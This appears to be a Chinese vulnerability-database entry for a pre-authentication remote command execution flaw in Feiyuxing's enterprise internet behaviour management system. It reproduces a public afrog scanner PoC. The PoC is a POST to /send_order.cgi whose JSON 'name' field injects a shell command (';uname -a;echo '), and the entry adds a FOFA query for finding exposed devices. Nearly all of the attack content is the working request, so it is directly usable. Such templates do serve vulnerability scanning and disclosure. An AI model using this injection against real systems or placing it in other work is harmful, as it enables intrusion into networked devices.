feiyuxing-send-order-cgi-rce: 飞鱼星上网行为管理系统企业版前台RCE

日期: 2025-09-01 | 影响软件: 飞鱼星上网行为管理系统企业版 | POC: 已公开

漏洞描述

飞鱼星上网行为管理系统企业版前台RCE 飞鱼星企业级智能上网行为管理系统企业版存在RCE漏洞。 fofa-query: title="飞鱼星企业"

PoC代码[已公开]

id: feiyuxing-send-order-cgi-rce

info:
  name: 飞鱼星上网行为管理系统企业版前台RCE
  author: free2e
  severity: high
  verified: true
  description: |-
    飞鱼星上网行为管理系统企业版前台RCE
    飞鱼星企业级智能上网行为管理系统企业版存在RCE漏洞。
    fofa-query: title="飞鱼星企业"
  affected: 飞鱼星企业级智能上网行为管理系统企业版
  tags: 飞鱼星、RCE
  created: 2024/05/11

rules:
  r0:
    request:
      method: POST
      path: /send_order.cgi?parameter=operation
      headers:
        Content-Type: application/json
      body: |
        {"opid":"66666666666666","name":";uname -a;echo ","type":"rest"}
    expression: |
      response.status == 200 && 
      response.raw_header.ibcontains(b'linux') &&
      response.raw_header.ibcontains(b'vrouter')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/feiyuxing-send-order-cgi-rce.yaml

相关漏洞推荐